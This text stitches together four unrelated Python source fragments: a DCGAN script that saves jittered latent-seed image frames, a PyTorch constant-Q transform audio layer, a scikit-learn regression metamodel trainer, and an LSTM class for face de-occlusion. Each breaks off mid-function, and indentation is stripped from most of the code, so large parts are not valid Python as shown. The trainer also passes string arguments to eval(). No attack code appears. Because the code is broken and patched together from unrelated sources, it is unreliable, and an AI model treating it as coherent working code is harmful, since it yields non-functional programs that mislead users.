with open("/".join((base_dir, start_image_json)) + ".json") as f:
start_seed = json.load(f)
start_seed = np.asarray(start_seed, dtype=np.float32)
max_step = cut["max_step"]
while stored_images < total_frame_num:
batch_idx = 0
# batch_seeds = np.zeros(shape=(config.batch_size, Gs.input_shapes[0][1]), dtype=np.float32)
batch_seeds = np.zeros(shape=(config.batch_size, 100), dtype=np.float32)
while batch_idx < config.batch_size:
if mode_num == 8:
curr_seed = step_flicker(start_seed, rand_state, cut)
batch_seeds[batch_idx] = curr_seed
batch_idx += 1
num_queued_images += 1
# labels = np.zeros([batch_seeds[0].shape[0]] + Gs.input_shapes[1][1:]) # Dummy data input
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: batch_seeds})
# samples = Gs.run(batch_seeds, labels)
# samples = np.swapaxes(samples, 2, 3)
# samples = np.swapaxes(samples, 1, 3)
# Save
for i in range(config.batch_size):
json_file = config.gen_json.split("/")[-1]
json_file_name = json_file.split(".")[0]
save_name = '{}_{}_{}_{:05d}'.format(json_file_name, config.dataset, time_stamp , count)
count += 1
img_path = config.sample_dir + "/" + save_name + '.png'
scipy.misc.imsave(img_path, samples[i, :, :, :])
print(Fore.CYAN + "Image saved: " + img_path)
stored_images += 1
if stored_images >= total_frame_num:
print(Fore.CYAN + "Done !")
return count
return count
def step_flicker(start_seed, rand_state, cut):
max_step = cut["max_step"]
rand_offset = (rand_state.rand(start_seed.shape[0]) - np.float32(0.5)) * np.float32(2.0)
return start_seed + np.float32(max_step) * rand_offset
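# Sketch of what generate_flicker (mode 8) does per frame: every batch entry is the
# fixed start seed plus an independent uniform jitter of at most max_step per
# dimension (illustrative only; max_step and z_dim below are hypothetical values).
def _demo_step_flicker(n_frames=5, z_dim=100, max_step=0.05, seed=0):
    import numpy as np
    rand_state = np.random.RandomState(seed)
    start_seed = np.zeros(z_dim, dtype=np.float32)
    for _ in range(n_frames):
        z = step_flicker(start_seed, rand_state, {"max_step": max_step})
        print(np.abs(z - start_seed).max())  # always <= max_step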
def wrap_lerp(val, low, high, cut, is_buggy=False):
# overflow_buffer = cut["overflow_buffer"]
overflow_buffer = 0.0
usual_cutoff = cut["usual_cutoff"]
inner_dist = np.absolute(high - low)
max_dist = np.maximum(np.absolute(high), np.absolute(low))
result = np.zeros(low.shape, dtype=np.float32)
normal_wrap_count = 0
for i in range(low.shape[0]):
curr_cutoff = usual_cutoff
if max_dist[i] > usual_cutoff:
outlier_cutoff = max_dist[i] + overflow_buffer
curr_cutoff = outlier_cutoff
wrap_dist = outlier_cutoff * 2.0 - inner_dist[i]
else:
wrap_dist = usual_cutoff * 2.0 - inner_dist[i]
# val = 1.0 # NOTE: DEBUG
if wrap_dist < inner_dist[i]:
# Wrap lerp
vect_oppo = - (high[i] - low[i]) / np.absolute(high[i] - low[i])
curr_lerped = low[i] + vect_oppo * val * wrap_dist
# print("bef clamp: " + str(curr_lerped))
if curr_lerped > curr_cutoff:
old_val = curr_lerped
curr_lerped = -curr_cutoff + (curr_lerped - curr_cutoff)
print("Wrap " + str(i) | |
# Create the low-pass filter and make it a torch tensor
if verbose==True:
print("Creating low pass filter ...", end='\r')
start = time()
lowpass_filter = torch.tensor(create_lowpass_filter(
band_center = 0.5,
kernelLength=256,
transitionBandwidth=0.001
)
)
# Broadcast the tensor to the shape that fits conv1d
self.register_buffer('lowpass_filter', lowpass_filter[None,None,:])
if verbose==True:
print("Low pass filter created, time used = {:.4f} seconds".format(time()-start))
# Calculate the number of filters required for the kernel
# n_octaves determines how many resampling steps are required for the CQT
n_filters = min(bins_per_octave, n_bins)
self.n_octaves = int(np.ceil(float(n_bins) / bins_per_octave))
# print("n_octaves = ", self.n_octaves)
# Calculate the lowest frequency bin for the top octave kernel
self.fmin_t = fmin*2**(self.n_octaves-1)
remainder = n_bins % bins_per_octave
# print("remainder = ", remainder)
if remainder==0:
# Calculate the top bin frequency
fmax_t = self.fmin_t*2**((bins_per_octave-1)/bins_per_octave)
else:
# Calculate the top bin frequency
fmax_t = self.fmin_t*2**((remainder-1)/bins_per_octave)
self.fmin_t = fmax_t/2**(1-1/bins_per_octave) # Adjusting the top minimum bins
if fmax_t > sr/2:
raise ValueError('The top bin {}Hz has exceeded the Nyquist frequency, \
please reduce the n_bins'.format(fmax_t))
if self.earlydownsample == True: # Do early downsampling if this argument is True
if verbose==True:
print("Creating early downsampling filter ...", end='\r')
start = time()
sr, self.hop_length, self.downsample_factor, early_downsample_filter, \
self.earlydownsample = get_early_downsample_params(sr,
hop_length,
fmax_t,
Q,
self.n_octaves,
verbose)
self.register_buffer('early_downsample_filter', early_downsample_filter)
if verbose==True:
print("Early downsampling filter created, \
time used = {:.4f} seconds".format(time()-start))
else:
self.downsample_factor=1.
# Preparing CQT kernels
if verbose==True:
print("Creating CQT kernels ...", end='\r')
start = time()
# print("Q = {}, fmin_t = {}, n_filters = {}".format(Q, self.fmin_t, n_filters))
basis, self.n_fft, _ = create_cqt_kernels(Q,
sr,
self.fmin_t,
n_filters,
bins_per_octave,
norm=basis_norm,
topbin_check=False)
# This is for the normalization in the end
freqs = fmin * 2.0 ** (np.r_[0:n_bins] / float(bins_per_octave))
lenghts = np.ceil(Q * sr / freqs)
lenghts = torch.tensor(lenghts).float()
self.register_buffer('lenghts', lenghts)
self.basis=basis
fft_basis = fft(basis)[:,:self.n_fft//2+1] # Convert the CQT kernel from the time domain to the frequency domain
# These CQT kernels are already in the frequency domain
cqt_kernels_real = torch.tensor(fft_basis.real.astype(np.float32))
cqt_kernels_imag = torch.tensor(fft_basis.imag.astype(np.float32))
if verbose==True:
print("CQT kernels created, time used = {:.4f} seconds".format(time()-start))
# print("Getting cqt kernel done, n_fft = ",self.n_fft)
# Preparing kernels for Short-Time Fourier Transform (STFT)
# We set the frequency range in the CQT filter instead of here.
if verbose==True:
print("Creating STFT kernels ...", end='\r')
start = time()
kernel_sin, kernel_cos, self.bins2freq, _, window = create_fourier_kernels(self.n_fft, window='ones', freq_scale='no')
wsin = kernel_sin * window
wcos = kernel_cos * window
wsin = torch.tensor(wsin)
wcos = torch.tensor(wcos)
if verbose==True:
print("STFT kernels created, time used = {:.4f} seconds".format(time()-start))
if trainable_STFT:
wsin = torch.nn.Parameter(wsin, requires_grad=trainable_kernels)
wcos = torch.nn.Parameter(wcos, requires_grad=trainable_kernels)
self.register_parameter('wsin', wsin)
self.register_parameter('wcos', wcos)
else:
self.register_buffer('wsin', wsin)
self.register_buffer('wcos', wcos)
if trainable_CQT:
cqt_kernels_real = torch.nn.Parameter(cqt_kernels_real, requires_grad=trainable_kernels)
cqt_kernels_imag = torch.nn.Parameter(cqt_kernels_imag, requires_grad=trainable_kernels)
self.register_parameter('cqt_kernels_real', cqt_kernels_real)
self.register_parameter('cqt_kernels_imag', cqt_kernels_imag)
else:
self.register_buffer('cqt_kernels_real', cqt_kernels_real)
self.register_buffer('cqt_kernels_imag', cqt_kernels_imag)
# If center==True, the STFT window will be put in the middle, and paddings at the beginning
# and ending are required.
if self.pad_mode == 'constant':
self.padding = nn.ConstantPad1d(self.n_fft//2, 0)
elif self.pad_mode == 'reflect':
self.padding = nn.ReflectionPad1d(self.n_fft//2)
def forward(self,x, output_format=None):
"""
Convert a batch of waveforms to CQT spectrograms.
Parameters
----------
x : torch tensor
Input signal should be in either of the following shapes.\n
1. ``(len_audio)``\n
2. ``(num_audio, len_audio)``\n
3. ``(num_audio, 1, len_audio)``
It will be automatically broadcast to the right shape
"""
output_format = output_format or self.output_format
x = broadcast_dim(x)
if self.earlydownsample==True:
x = downsampling_by_n(x, self.early_downsample_filter, self.downsample_factor)
hop = self.hop_length
CQT = get_cqt_complex(x, self.wcos, self.wsin, hop, self.padding) # Getting the top octave CQT
x_down = x # Preparing a new variable for downsampling
for i in range(self.n_octaves-1):
hop = hop//2
x_down = downsampling_by_2(x_down, self.lowpass_filter)
CQT1 = get_cqt_complex(x_down, self.wcos, self.wsin, hop, self.padding)
CQT = torch.cat((CQT1, CQT),1)
CQT = CQT[:,-self.n_bins:,:] # Removing unwanted top bins
if self.norm:
CQT = CQT/self.n_fft*torch.sqrt(self.lenghts.view(-1,1,1))
else:
CQT = CQT*torch.sqrt(self.lenghts.view(-1,1,1))
# Normalizing the output with the downsampling factor, 2**(self.n_octaves-1),
# to keep the magnitude consistent with the 1992 algorithm
CQT = CQT*self.downsample_factor
if output_format=='Magnitude':
# Getting CQT Amplitude
return torch.sqrt(CQT.pow(2).sum(-1))
elif output_format=='Complex':
return CQT
elif output_format=='Phase':
phase_real = torch.cos(torch.atan2(CQT[:,:,:,1],CQT[:,:,:,0]))
phase_imag = torch.sin(torch.atan2(CQT[:,:,:,1],CQT[:,:,:,0]))
return torch.stack((phase_real,phase_imag), -1)
def extra_repr(self) -> str:
return 'STFT kernel size = {}, CQT kernel size = {}'.format(
(*self.wcos.shape,), (*self.cqt_kernels_real.shape,)
)
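# A minimal usage sketch (illustrative, not part of the original module): forward()
# above accepts 1-D, 2-D or 3-D waveforms and broadcasts them all to
# (num_audio, 1, len_audio). Any CQT layer from this module can be passed in,
# e.g. an instance of CQT1992v2 defined below.
def _demo_cqt_input_shapes(spec_layer, len_audio=22050, num_audio=2):
    import torch
    x1 = torch.randn(len_audio)                # (len_audio)
    x2 = torch.randn(num_audio, len_audio)     # (num_audio, len_audio)
    x3 = torch.randn(num_audio, 1, len_audio)  # (num_audio, 1, len_audio)
    return [spec_layer(x) for x in (x1, x2, x3)]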
class CQT1992v2(torch.nn.Module):
"""This function is to calculate the CQT of the input signal.
Input signal should be in either of the following shapes.\n
1. ``(len_audio)``\n
2. ``(num_audio, len_audio)``\n
3. ``(num_audio, 1, len_audio)``
The correct shape will be inferred automatically if the input follows these 3 shapes.
Most of the arguments follow the convention from librosa.
This class inherits from ``torch.nn.Module``, therefore, the usage is same as ``torch.nn.Module``.
This algorithm uses the method proposed in [1]. I slightly modified it so that it runs faster
than the original 1992 algorithm; that is why it is called version 2.
[1] Brown, <NAME>. and <NAME>. “An efficient algorithm for the calculation of a
constant Q transform.” (1992).
Parameters
----------
sr : int
The sampling rate for the input audio. It is used to calculate the correct ``fmin`` and ``fmax``.
Setting the correct sampling rate is very important for calculating the correct frequency.
hop_length : int
The hop (or stride) size. Default value is 512.
fmin : float
The frequency for the lowest CQT bin. Default is 32.70Hz, which corresponds to the note C0.
fmax : float
The frequency for the highest CQT bin. Default is ``None``, therefore the highest CQT bin is
inferred from the ``n_bins`` and ``bins_per_octave``.
If ``fmax`` is not ``None``, then the argument ``n_bins`` will be ignored and ``n_bins``
will be calculated automatically. Default is ``None``
n_bins : int
The total numbers of CQT bins. Default is 84. Will be ignored if ``fmax`` is not ``None``.
bins_per_octave : int
Number of bins per octave. Default is 12.
norm : int
Normalization for the CQT kernels. ``1`` means L1 normalization, and ``2`` means L2 normalization.
Default is ``1``, which is the same as the normalization used in librosa.
window : str
The windowing function for CQT. It uses ``scipy.signal.get_window``, please refer to
scipy documentation for possible windowing functions. The default value is 'hann'.
center : bool
Putting the CQT kernel at the center of the time-step or not. If ``False``, the time index is
the beginning of the CQT kernel; if ``True``, the time index is the center of the CQT kernel.
Default value is ``True``.
pad_mode : str
The padding method. Default value is 'reflect'.
trainable : bool
Determine if the CQT kernels are trainable or not. If ``True``, the gradients for CQT kernels
will also be calculated and the CQT kernels will be updated during model training.
Default value is ``False``.
output_format : str
Determine the return type.
``Magnitude`` will return the magnitude of the STFT result, shape = ``(num_samples, freq_bins,time_steps)``;
``Complex`` will return the STFT result in complex number, shape = ``(num_samples, freq_bins,time_steps, 2)``;
``Phase`` will return the phase of the STFT result, shape = ``(num_samples, freq_bins,time_steps, 2)``.
The complex number is stored as ``(real, imag)`` in the last axis. Default value is 'Magnitude'.
verbose : bool
If ``True``, it shows layer information. If ``False``, it suppresses all prints
Returns
-------
spectrogram : torch.tensor
It returns a tensor of spectrograms.
shape = ``(num_samples, freq_bins,time_steps)`` if ``output_format='Magnitude'``;
shape = ``(num_samples, freq_bins,time_steps, 2)`` if ``output_format='Complex' or 'Phase'``;
Examples
--------
>>> spec_layer = Spectrogram.CQT1992v2()
>>> specs = spec_layer(x)
"""
def __init__(self, sr=22050, hop_length=512, fmin=32.70, fmax=None, n_bins=84,
bins_per_octave=12, norm=1, window='hann', center=True, pad_mode='reflect',
trainable=False, output_format='Magnitude', verbose=True):
super().__init__()
# norm arg is not functioning
self.trainable = trainable
self.hop_length = hop_length
self.center = center
self.pad_mode = pad_mode
self.output_format = output_format
# creating kernels for CQT
Q = 1/(2**(1/bins_per_octave)-1)
if verbose==True:
print("Creating CQT kernels ...", end='\r')
start = time()
cqt_kernels, self.kernel_width, lenghts = create_cqt_kernels(Q,
sr,
fmin,
n_bins,
bins_per_octave,
norm,
window,
fmax)
self.register_buffer('lenghts', lenghts)
cqt_kernels_real = torch.tensor(cqt_kernels.real).unsqueeze(1)
cqt_kernels_imag = torch.tensor(cqt_kernels.imag).unsqueeze(1)
if trainable:
cqt_kernels_real = torch.nn.Parameter(cqt_kernels_real, requires_grad=trainable)
cqt_kernels_imag = torch.nn.Parameter(cqt_kernels_imag, requires_grad=trainable)
self.register_parameter('cqt_kernels_real', cqt_kernels_real)
self.register_parameter('cqt_kernels_imag', cqt_kernels_imag)
else:
self.register_buffer('cqt_kernels_real', cqt_kernels_real)
self.register_buffer('cqt_kernels_imag', cqt_kernels_imag)
if verbose==True:
print("CQT kernels created, time used = {:.4f} seconds".format(time()-start))
def forward(self,x, output_format=None):
"""
Convert a batch of waveforms | |
<gh_stars>0
"""
This module provides a prototypical interface that allows the user to
train approximation models based on given training datasets.
"""
import copy
import numpy as np
import pandas
from scipy.stats import randint as sp_randint
from scipy.stats import uniform as sp_uniform
from sklearn import neighbors, tree
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import LinearRegression, MultiTaskLassoCV, RidgeCV
from sklearn.linear_model import MultiTaskElasticNetCV
from sklearn.metrics import (make_scorer, mean_absolute_error,
mean_squared_error, r2_score)
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn.multioutput import MultiOutputRegressor
from sklearn.neural_network import MLPRegressor
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVR
from memobuilder.mtrainer import scores
class MetaModel(object):
"""
This class serves as a superclass for all approximation models and
provides a common interface to be used by the Trainer and outside
of this module. It manages a chain of preprocessing steps and
provides the methods :meth:`fit` and :meth:`predict` to fit the
concrete model to the given training data and to predict output
values given the respective inputs.
:param kwargs: arbitrary keyword arguments that will be passed to
*this.model* when it is fitted to the training data.
"""
train_score = {
'r2_score': {
'name': 'r2_score', 'function': make_scorer(
r2_score, greater_is_better=True)},
'mae': {
'name': 'mean_absolute_error',
'function': make_scorer(
mean_absolute_error, greater_is_better=False)},
'hae': {
'name': 'harmonic_average_error',
'function': make_scorer(
scores.harmonic_averages_error, greater_is_better=False)},
'mse': {
'name': 'mean_squared_error',
'function': make_scorer(
mean_squared_error, greater_is_better=False)}}
def __init__(self, input_names=None, response_names=None,
preprocessors=None, trainer_score='r2_score', **kwargs):
"""
:param kwargs: arbitrary keyword arguments that will be passed
to *this.regression_pipeline* when it is fitted to the
training data.
"""
if input_names is None:
input_names = []
if response_names is None:
response_names = []
if preprocessors is None:
preprocessors = []
self.kwargs = kwargs
# An sklearn Pipeline.
# See http://scikit-learn.org/stable/modules/generated/ \
# sklearn.pipeline.Pipeline.html#sklearn.pipeline.Pipeline
self.regression_pipeline = None
# A list of dataset transformations that will be added to the
# pipeline before the model will be fitted to the data.
self.processing_steps = preprocessors
# A list of input names in the same order as in the training
# dataset. The trainer class sets this value according to the
# dataset used for the training.
self.input_names = input_names
# A list of response names in the same order as in the training
# dataset. The trainer class sets this value according to the
# dataset used for the training.
self.response_names = response_names
self.score = self.train_score[trainer_score]
def fit(self, x_train, y_train):
"""
Fits the model to the data such that it reproduces the expected
output data. Raises an exception because this method must be
implemented by concrete MetaModel implementations.
:param x_train: array-like of shape [n_samples,n_features]
training data
:param y_train: array-like of shape [n_samples, n_targets]
target values
"""
raise NotImplementedError('fit() must be implemented by concrete MetaModel subclasses')
def predict(self, X):
"""
Uses *self.regression_pipeline* to predict an output value
for input vector *X*.
:param X: array-like, shape = (n_samples, n_features)
Input data
:return: array, shape = (n_samples, n_outputs)
Returns predicted values.
"""
val = self.regression_pipeline.predict(X)
return pandas.DataFrame(val, columns=self.response_names)
def _update_pipeline_and_fit(self, x_train, y_train, steps):
"""
Constructs a pipeline from the preprocessing steps, fits it to the input and
output data, and stores the fitted pipeline in *self.regression_pipeline*.
:param x_train: array-like, shape = (n_samples, n_features)
input data
:param y_train: array-like, shape = (n_samples, n_outputs)
output data
:param steps: list of data transformations
data transformations to add to the model pipeline.
"""
# work on a copy of the pipeline, so that it can be reused
processing_steps = copy.copy(self.processing_steps)
for step in steps:
processing_steps.append(step)
pipeline = make_pipeline(*processing_steps)
# perform preprocessing and create metamodel
self.regression_pipeline = pipeline.fit(x_train, y_train)
if hasattr(pipeline._final_estimator, 'best_params_'):
print('best params: ',
pipeline._final_estimator.best_params_)
def create_model_parameter_dict(self, key_value):
return {arg.key: arg.value for arg in key_value}
def __repr__(self):
return '%s [%s]' % (self.__class__.__name__, str(self.__dict__))
class OLSModel(MetaModel):
"""
Fits a linear model to the data using ordinary least squares method.
See http://scikit-learn.org/stable/modules/linear_model.html for a
more detailed explanation of this method.
:param kwargs: keyword arguments that will be passed to the
constructor of the LinearRegression model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
"""
Fits the model to the data such that it reproduces the expected
output data.
:param x_train: array-like of shape [n_samples,n_features]
training data
:param y_train: array-like of shape [n_samples, n_targets]
target values
"""
ols = LinearRegression(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [ols])
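# A short usage sketch (illustrative only; in practice the Trainer sets input_names
# and response_names from the training dataset, and the column names below are
# hypothetical).
def _example_ols_usage(x_train, y_train, x_test):
    model = OLSModel(input_names=['x1', 'x2'], response_names=['y'])
    model.fit(x_train, y_train)    # x_train: (n_samples, 2), y_train: (n_samples, 1)
    return model.predict(x_test)   # pandas.DataFrame with column 'y'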
class Lasso(MetaModel):
"""
Fits a linear model to the data using a multitask lasso
implementation with built-in cross-validation.
See http://scikit-learn.org/stable/modules/linear_model.html#lasso
for a general explanation of the lasso method.
:param kwargs: keyword arguments that will be passed on to the
constructor of the lasso model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
lasso = MultiTaskLassoCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [lasso])
class RidgeRegressionModel(MetaModel):
""" """
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
regr = RidgeCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [regr])
class ElasticNetModel(MetaModel):
"""
Fits a linear model to the data using a multitask *elastic net*
implementation with built-in cross-validation. See
http://scikit-learn.org/stable/modules/linear_model.html#elastic-net
for a general explanation of the elastic net method.
:param kwargs: keyword arguments that will be passed on to the
constructor of the lasso model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
elastic_net = MultiTaskElasticNetCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [elastic_net])
class Kriging(MetaModel):
"""
Fits a gaussian process to the data while optionally using
GridSearchCV for an exhaustive search over specified
parameter values. See
http://scikit-learn.org/stable/modules/gaussian_process.html
for a general explanation of gaussian processes and regression
with gaussian processes.
:param kwargs: keyword arguments that will be passed on to the
constructor of the gaussian process.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
clf = GaussianProcessRegressor(alpha=0.01, n_restarts_optimizer=100,
random_state=np.random.randint(1000))
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KNeighborsModel(MetaModel):
"""
Uses nearest neighbors regression to represent a function that maps
input values to output values while optionally using GridSearchCV
for an exhaustive search over specified parameter values. See
http://scikit-learn.org/stable/modules/neighbors.html#regression
for a general explanation of nearest neighbors regression.
:param kwargs: keyword arguments that will be passed on to the
constructor of the nearest neighbors regressor.
Additional keyword arguments:
:param_grid: If the parameter *param_grid* is present in the
keyword arguments it will be used to set up an exhaustive grid
search for the best estimator among all combinations of
hyperparameters such as the number of neighbors *n_neighbors*
to consider and the way the neighbors are weighted (*weights*).
See http://scikit-learn.org/stable/modules/grid_search.html for
an example of such a *param_grid*.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid' in self.kwargs:
param_grid = self.kwargs['param_grid']
else:
param_grid = {
'n_neighbors': sp_randint(1, 15)
}
clf = RandomizedSearchCV(
neighbors.KNeighborsRegressor(),
param_distributions=param_grid,
n_iter=5,
cv=3,
iid=True)
self._update_pipeline_and_fit(x_train, y_train, [clf])
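# Sketch of the param_grid keyword described in the KNeighborsModel docstring
# (illustrative values; any distribution or value list accepted by
# RandomizedSearchCV works here).
def _example_knn_with_param_grid(x_train, y_train):
    model = KNeighborsModel(param_grid={'n_neighbors': sp_randint(1, 30),
                                        'weights': ['uniform', 'distance']})
    model.fit(x_train, y_train)
    return model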
class ArtificialNeuralNetwork(MetaModel):
""" """
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.processing_steps = [StandardScaler()]
ann = MLPRegressor()
params = {'hidden_layer_sizes': sp_randint(20, 150),
'alpha': sp_uniform(0, 100),
'max_iter': sp_randint(100, 2000),
'solver': ['lbfgs'],
# 'identity', 'logistic', 'tanh', 'relu'
'activation': ['relu']}
if 'hidden_layer_sizes' in self.kwargs:
self.kwargs['hidden_layer_sizes'] = self.parsefunction(
self.kwargs['hidden_layer_sizes']
)
params.update(self.kwargs)
clf = RandomizedSearchCV(
estimator=ann,
param_distributions=params,
n_iter=10,
scoring=self.score['function'],
cv=3,
iid=True)
self._update_pipeline_and_fit(x_train, y_train, [clf])
def parsefunction(self, string_tuple):
    array = []
    for string in string_tuple:
        parsed = self.parse_tuple(string)
        if parsed is None:
            parsed = int(string)
        array.append(parsed)
    return array
def parse_tuple(self, string):
    try:
        s = eval(string)
        if type(s) == tuple:
            return s
        return None
    except Exception:
        return None
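# Worked example of the parsing helpers above (illustrative): parsefunction turns the
# string form of hidden_layer_sizes into what RandomizedSearchCV expects, e.g.
#   ArtificialNeuralNetwork().parsefunction(('(50, 50)', '100'))  ->  [(50, 50), 100]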
class SupportVectorRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.processing_steps = [StandardScaler()]
svr = SVR(kernel='rbf', gamma=0.1)
# http://www.csie.ntu.edu.tw/~cjlin/papers/guide/guide.pdf
# C = [2**i for i in np.arange(start=-5, stop=16, step=2)]
# gamma = [2**i for i in np.arange(start=-15, stop=4, step=2)]
# https://stats.stackexchange.com/questions/43943/
# which-search-range-for-determining-svm-optimal-c-
# and-gamma-parameters
C = [2 ** i for i in [-3, -2, -1, 0, 1, 2, 3, 4, 5]]
gamma = [2 ** i for i in [-5, -4, -3, -2, -1, 0, 1, 2, 3]]
params = {"C": sp_uniform(0.125, 32),
"gamma": sp_uniform(0.03125, 8)}
params.update(self.kwargs)
reg = RandomizedSearchCV(
estimator=svr,
param_distributions=params,
n_iter=10,
scoring=self.score['function'],
cv=3,
iid=True)
clf = MultiOutputRegressor(reg)
self._update_pipeline_and_fit(x_train, y_train, [clf])
class DecisionTreeRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid' in self.kwargs:
raise Exception('not implemented')
else:
clf = tree.DecisionTreeRegressor()
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KernelRidgeRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid' in self.kwargs:
raise Exception('not implemented')
else:
clf = KernelRidge(alpha=1.0)
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KernelRidgeRegressionCV(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if all([np.isscalar(param) | |
<reponame>zhaofang0627/face-deocc-lstm<gh_stars>10-100
from util import *
import numpy as np
class LSTM(object):
def __init__(self, lstm_config):
self.name_ = lstm_config.name
num_lstms = lstm_config.num_hid
assert num_lstms > 0
self.num_lstms_ = num_lstms
self.has_input_ = lstm_config.has_input
self.has_output_ = lstm_config.has_output
self.has_spatial_ = lstm_config.has_spatial
self.has_spatial_dec_ = lstm_config.has_spatial_dec
self.image_dims_ = lstm_config.image_dims
self.image_side_ = lstm_config.image_side
self.input_dims_ = lstm_config.input_dims
self.input_patch_side_ = lstm_config.input_patch_side
self.output_patch_side_ = lstm_config.output_patch_side
self.output_dims_ = lstm_config.output_dims
self.use_relu_ = lstm_config.use_relu
self.input_dropprob_ = lstm_config.input_dropprob
self.output_dropprob_ = lstm_config.output_dropprob
self.i_ = 0
self.j_ = 0
self.is_imput_mr_ = 0
self.w_dense_row_ = Param((5 * num_lstms, num_lstms), lstm_config.w_dense)
self.w_dense_col_ = Param((5 * num_lstms, num_lstms), lstm_config.w_dense)
self.w_diag_ = Param((num_lstms, 5), lstm_config.w_diag)
self.b_ = Param((5 * num_lstms, 1), lstm_config.b)
self.param_list_ = [
('%s:w_dense_row' % self.name_, self.w_dense_row_),
('%s:w_dense_col' % self.name_, self.w_dense_col_),
('%s:w_diag' % self.name_, self.w_diag_),
('%s:b' % self.name_, self.b_),
]
if self.has_input_:
assert self.input_dims_ > 0
self.w_input_ = Param((5 * num_lstms, self.input_dims_), lstm_config.w_input)
self.param_list_.append(('%s:w_input' % self.name_, self.w_input_))
if self.has_spatial_:
self.w_input_mr_ = Param((5 * num_lstms, self.input_dims_), lstm_config.w_input)
self.param_list_.append(('%s:w_input_mr' % self.name_, self.w_input_mr_))
if self.has_output_:
assert self.output_dims_ > 0
self.w_output_ = Param((self.output_dims_, num_lstms), lstm_config.w_output)
self.param_list_.append(('%s:w_output' % self.name_, self.w_output_))
self.b_output_ = Param((self.output_dims_, 1), lstm_config.b_output)
self.param_list_.append(('%s:b_output' % self.name_, self.b_output_))
def HasInputs(self):
return self.has_input_
def HasOutputs(self):
return self.has_output_
def GetParams(self):
return self.param_list_
def SetBatchSize(self, batch_size, row_length, col_length, stride=0):
assert batch_size > 0
assert row_length > 0
assert col_length > 0
self.batch_size_ = batch_size
self.row_length_ = row_length
self.col_length_ = col_length
self.stride_ = stride
seq_length = row_length * col_length
self.gates_ = cm.empty((5 * self.num_lstms_, batch_size * seq_length))
self.cell_ = cm.empty((self.num_lstms_, batch_size * seq_length))
self.hidden_ = cm.empty((self.num_lstms_, batch_size * seq_length))
self.gates_deriv_ = cm.empty_like(self.gates_)
self.cell_deriv_ = cm.empty_like(self.cell_)
self.hidden_deriv_ = cm.empty_like(self.hidden_)
if self.has_input_ and self.has_spatial_:
self.para_atten_ = cm.empty((5, batch_size))
self.F_x_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
self.F_y_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
self.patches_ = cm.empty((self.input_dims_, batch_size * seq_length))
self.patches_mr_ = cm.empty((self.input_dims_, batch_size * seq_length))
self.patches_left_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
if self.has_output_ and self.has_spatial_dec_:
self.para_atten_hat_ = cm.empty((5, batch_size))
self.F_x_hat_ = cm.empty((self.output_patch_side_ * self.image_side_, batch_size * seq_length))
self.F_y_hat_ = cm.empty((self.output_patch_side_ * self.image_side_, batch_size * seq_length))
self.output_patch_ = cm.empty((self.output_dims_, batch_size))
self.canvas_ = cm.empty((self.image_dims_, batch_size))
self.canvas_left_ = cm.empty((self.image_side_ * self.output_patch_side_, batch_size))
self.output_patch_deriv_ = cm.empty_like(self.output_patch_)
"""
if self.has_output_ and self.output_dropprob_ > 0:
self.output_drop_mask_ = cm.empty_like(self.hiddenbatch_size, self.num_lstms_)) for i in xrange(seq_length)]
self.output_intermediate_state_ = [cm.empty((batch_size, self.num_lstms_)) for i in xrange(seq_length)]
self.output_intermediate_deriv_ = [cm.empty((batch_size, self.num_lstms_)) for i in xrange(seq_length)]
if self.has_input_ and self.input_dropprob_ > 0:
self.input_drop_mask_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
self.input_intermediate_state_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
self.input_intermediate_deriv_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
"""
def Load(self, f):
for name, p in self.param_list_:
p.Load(f, name)
def Save(self, f):
for name, p in self.param_list_:
p.Save(f, name)
def Fprop(self, input_frame=None, init_cell=None, init_hidden=None, occ_pre=None, input_mr=None, output_frame=None, prev_model_hidden=None, reverse=False):
if reverse:
i = self.col_length_ - 1 - self.i_
j = self.row_length_ - 1 - self.j_
else:
i = self.i_
j = self.j_
t = self.i_ * self.row_length_ + self.j_
batch_size = self.batch_size_
assert i >= 0
assert j >= 0
assert i < self.col_length_
assert j < self.row_length_
num_lstms = self.num_lstms_
start = t * batch_size
end = start + batch_size
gates = self.gates_.slice(start, end)
cell_state = self.cell_.slice(start, end)
hidden_state = self.hidden_.slice(start, end)
if t == 0:
if init_cell is None:
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
